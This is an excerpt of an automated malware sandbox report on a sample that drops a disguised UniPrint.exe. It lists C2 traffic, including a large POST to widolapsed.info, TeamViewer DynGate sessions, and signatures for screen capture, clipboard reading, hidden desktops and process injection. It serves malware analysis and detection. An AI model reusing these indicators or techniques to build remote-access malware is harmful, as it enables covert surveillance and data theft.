Source: UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/TTP-Out)LMEMX
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/apsed.info/qWave
Source: wogZe27GBB.exe String found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/info/privacy
Source: UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000002.1073981229.0000000002740000.00000004.00000001.sdmp String found in binary or memory: https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campai
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: https://www.teamviewer.com/licensing/order.aspx?lng=ja
Source: svchost.exe, 00000010.00000003.797707479.00000217C6FB0000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.797621613.00000217C6F5E000.00000004.00000001.sdmp String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: UniPrint.exe, 00000005.00000002.1072984731.0000000000B00000.00000004.00000020.sdmp String found in binary or memory: https://www.verisign.c
Source: unknown HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85991Content-Type: multipart/form-data; boundary=--------988836371User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: unknown DNS traffic detected: queries for: ping3.dyngate.com
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C5900 GetProcessHeap,GetProcessHeap,HeapAlloc,HttpQueryInfoW,InternetReadFile,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,RtlMoveMemory,InternetReadFile,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 3_2_6E5C5900
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5MkoZ6YmBgcGRsZGpmckySiHpgTJqChnpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJqSiHpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJ6meq7S3GZcYmJMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=42047145&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6sTY0saWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAH7LQs0qhaWs0MJjaOW1RZp/s+y/yn5XEbeVZg9sKBJ5zPw4VSW4zdwQ3dPOJPU35FNkIfcILZEzewXzbzR9HNSPt0dvZIMvjxebsFa8mt4yIfhUHNJCrU/eCKZvCgbkPO7XECRgFWPWpqy/DxavH2VA1uMNeC6MgWi1tqYJlUpU HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=42047152&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=42047159&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMlsrK4MLY0uzKemJMmMLczurCzsp61MJMmNLGytzmyqjy4Mp6YEyakoh6YPDKxsxoxMRwcsRmZG6+ZHJqbGhwYGxkbEyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpqTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=42047224&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=12251267&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Connection: Keep-AliveCache-Control: no-cache
Source: unknown HTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.4:49767 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to record screenshots
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C6B70 GetDesktopWindow,GetDC,CreateCompatibleDC,RtlZeroMemory,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,RtlZeroMemory,GetCursorInfo,RtlZeroMemory,GetIconInfo,RtlZeroMemory,GetObjectW,DrawIconEx,SHCreateMemStream,RtlZeroMemory,VirtualAlloc,RtlZeroMemory,VirtualFree,DeleteObject,DeleteDC,ReleaseDC, 3_2_6E5C6B70
Creates a DirectInput object (often for capturing keystrokes)
Source: wogZe27GBB.exe, 00000000.00000002.687265368.000000000079A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,SendMessageA,GlobalUnWire,SetClipboardData,CloseClipboard, 0_2_00405042
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CA020 GetCurrentThreadId,GetThreadDesktop,StrChrW,CreateDesktopW,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop, 3_2_6E5CA020

System Summary:

barindex
Uses 32bit PE files
Source: wogZe27GBB.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040323C EntryPoint,7329E7F0,SetErrorMode,OleInitialize,SHGetFileInfo,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcat,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcat,lstrcmpi,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040323C
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C5F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 3_2_6E5C5F30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C5F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 5_2_6E5C5F30
Detected potential crypto function
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00404853 0_2_00404853
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00406131 0_2_00406131
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_0053C2D6 5_2_0053C2D6
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004A13AA 5_2_004A13AA
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_0053E430 5_2_0053E430
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004C97CD 5_2_004C97CD
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_00534810 5_2_00534810
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_005438ED 5_2_005438ED
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004AC8A9 5_2_004AC8A9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_00544B6A 5_2_00544B6A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004B9F5A 5_2_004B9F5A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_00546FFB 5_2_00546FFB
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004A0FB2 5_2_004A0FB2
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 11_3_029AF876 11_3_029AF876
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 11_3_029AF876 11_3_029AF876
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 12_2_027ED77A 12_2_027ED77A
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 0040F6FE appears 62 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 0053BCB5 appears 419 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 0053E5C8 appears 32 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 0040DFA6 appears 31 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 004A1B0C appears 235 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: String function: 0053BCE8 appears 61 times
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C3760 GetProcessHeap,CreateEnvironmentBlock,RtlZeroMemory,StrChrW,RtlZeroMemory,CreateProcessAsUserW,CreateProcessAsUserW,Sleep,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle, 3_2_6E5C3760
Contains functionality to call native functions
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00401000 NtdllDefWindowProc_A,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint, 0_2_00401000
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CB420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 3_2_6E5CB420
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C8AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 3_2_6E5C8AF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CB340 NtGetContextThread,NtSetContextThread, 3_2_6E5CB340
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CB570 NtSuspendThread,NtClose, 3_2_6E5CB570
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CB160 NtProtectVirtualMemory, 3_2_6E5CB160
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C89F0 NtQuerySystemInformation,StrChrW,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,StrChrW,NtWriteVirtualMemory,NtFlushInstructionCache, 3_2_6E5C89F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CB5F0 NtResumeThread,NtClose,HeapFree, 3_2_6E5CB5F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CB650 RtlMoveMemory,NtFlushInstructionCache, 3_2_6E5CB650
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C7240 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree, 3_2_6E5C7240
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C2440 LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetCommandLineW,CommandLineToArgvW,lstrcmpiW,lstrcmpiW,StrRChrW,StrChrW,wsprintfW,OpenEventW,CreateEventW,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess, 3_2_6E5C2440
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C5220 RtlZeroMemory,RtlZeroMemory,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle, 3_2_6E5C5220
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C26E0 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose, 3_2_6E5C26E0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C1C90 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory, 3_2_6E5C1C90
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C1A80 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree, 3_2_6E5C1A80
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CA880 NtQueryVirtualMemory, 3_2_6E5CA880
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CB0B9 NtProtectVirtualMemory, 3_2_6E5CB0B9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C1570 NtAllocateVirtualMemory,NtAllocateVirtualMemory, 3_2_6E5C1570
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C1960 NtProtectVirtualMemory, 3_2_6E5C1960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C7D00 PostThreadMessageW,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageW,CreateThread,CallWindowProcW, 3_2_6E5C7D00
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C2FF0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessW,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 3_2_6E5C2FF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C27F0 GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RtlZeroMemory,RtlZeroMemory,CreateProcessW,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree, 3_2_6E5C27F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CB1A0 NtOpenThread, 3_2_6E5CB1A0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5CB420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 5_2_6E5CB420
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5CB570 NtSuspendThread,NtClose, 5_2_6E5CB570
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C7D00 PostThreadMessageW,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageW,CreateThread,CallWindowProcW, 5_2_6E5C7D00
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5CB5F0 NtResumeThread,NtClose,HeapFree, 5_2_6E5CB5F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C7240 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree, 5_2_6E5C7240
